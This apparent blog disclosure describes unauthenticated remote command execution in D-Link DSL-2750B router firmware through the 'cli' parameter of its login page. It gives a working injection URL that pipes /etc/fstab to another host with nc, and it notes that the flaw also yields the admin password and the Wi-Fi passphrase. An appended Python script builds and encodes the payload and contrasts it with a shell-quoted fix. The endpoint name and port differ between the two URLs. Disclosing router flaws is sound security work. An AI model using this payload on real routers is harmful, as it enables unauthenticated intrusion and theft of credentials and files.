D-Link router DSL-2750B firmware 1.01 to 1.03 – RCE no auth

    21-01-2017

    After playing around a bit with my home router, I noticed something interesting during the login phase: when wrong credentials are supplied, the user is redirected to an error page, and the URL caught my eye:

    http://192.168.1.1:666/login.cgi?cli=access%20login%20encrypted%2041544A25DC00170BA90659AD4CBDD9D9$


    To see what is actually happening, the web server on the router has to be started with debug output enabled.


    It seems that the value of the "cli" parameter is passed as input to a binary that executes the given command; the complete list of available commands is in the "/etc/ayecli/ayecli.cli" file on the router (among them a creepy "system halt" that shuts the router down no matter what).

    Arguments are used in this way:

    ayecli -c 'command-here'

    To execute arbitrary commands remotely, we close the quoted argument with a ', append ; and the command of our choice, and then add another '. That last quote pairs with the ' that the CGI substitutes for the "$" at the very end of the URL, forming an empty '' so the command line stays balanced and our command runs as a separate shell command:

    ayecli -c 'command';injection''

    that is:

    http://192.168.1.1/login.cli?cli=hwget wpassphrase_2.4G';nc 192.168.1.8 666 </etc/fstab'$



    By exploiting this bug it is also possible to retrieve the cleartext admin password, the Wi-Fi passphrase and so on, since those are exposed by the same ayecli commands that the login page already passes to the binary unauthenticated.
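    To make the quoting concrete, here is an added example (not code from the original post) that builds the payload the way the write-up describes and models what the router side does with it. It assumes two things taken from the text: the CGI prefixes the value with "ayecli -c '" and replaces the trailing "$" with "'" to close the quote. The attacker host, port and the /etc/fstab file are sample values matching the URL above, and the "fixed" variant is an added illustration of how the same value would be passed safely as a single shell-quoted argument. The shell-splitting helper tokenises the resulting command line like /bin/sh would, so you can see that the injected nc command becomes its own command in the vulnerable case and stays inside one argument in the hardened one.

```python
# Added example, not code from the original post. It models the injection
# described above under two assumptions taken from the write-up: the CGI
# builds the command line as  ayecli -c '<cli value>  and replaces the
# trailing "$" with "'" to close the quote. Host, port and file are
# constructed sample values matching the post's URL.
import shlex
from typing import List
from urllib.parse import quote

AYECLI_PREFIX = "ayecli -c '"   # assumed server-side prefix (per the post)


def build_cli_value(legit_cmd: str, injected: str) -> str:
    """Close the quoted ayecli argument, chain our command with ';', then
    reopen a quote so the server-side "$" -> "'" substitution yields ''."""
    return f"{legit_cmd}';{injected}'$"


def build_url(base: str, cli_value: str) -> str:
    """URL-encode the payload; '$' is kept literal so the CGI sees it."""
    return base + "?cli=" + quote(cli_value, safe="/$")


def server_command_line(cli_value: str) -> str:
    """What the vulnerable CGI hands to the shell (assumed, per the post)."""
    return AYECLI_PREFIX + cli_value.replace("$", "'")


def server_command_line_fixed(cli_value: str) -> str:
    """Hardened form (added illustration): the whole value becomes one
    shell-quoted argument, so ';' and quotes inside it are inert."""
    return "ayecli -c " + shlex.quote(cli_value)


def shell_commands(cmdline: str) -> List[List[str]]:
    """Tokenise like a POSIX shell and split into commands on ';'."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    value = build_cli_value("hwget wpassphrase_2.4G",
                            "nc 192.168.1.8 666 </etc/fstab")
    print(build_url("http://192.168.1.1/login.cli", value))
    print("vulnerable:", server_command_line(value))
    for cmd in shell_commands(server_command_line(value)):
        print("  shell runs:", cmd)
    print("fixed:     ", server_command_line_fixed(value))
    for cmd in shell_commands(server_command_line_fixed(value)):
        print("  shell runs:", cmd)
```

    Run it as a script to see both command lines side by side; on the vulnerable one the shell splitter reports two commands, the second being nc with /etc/fstab redirected into it, while the hardened one yields a single ayecli invocation whose -c argument is the untouched attacker string.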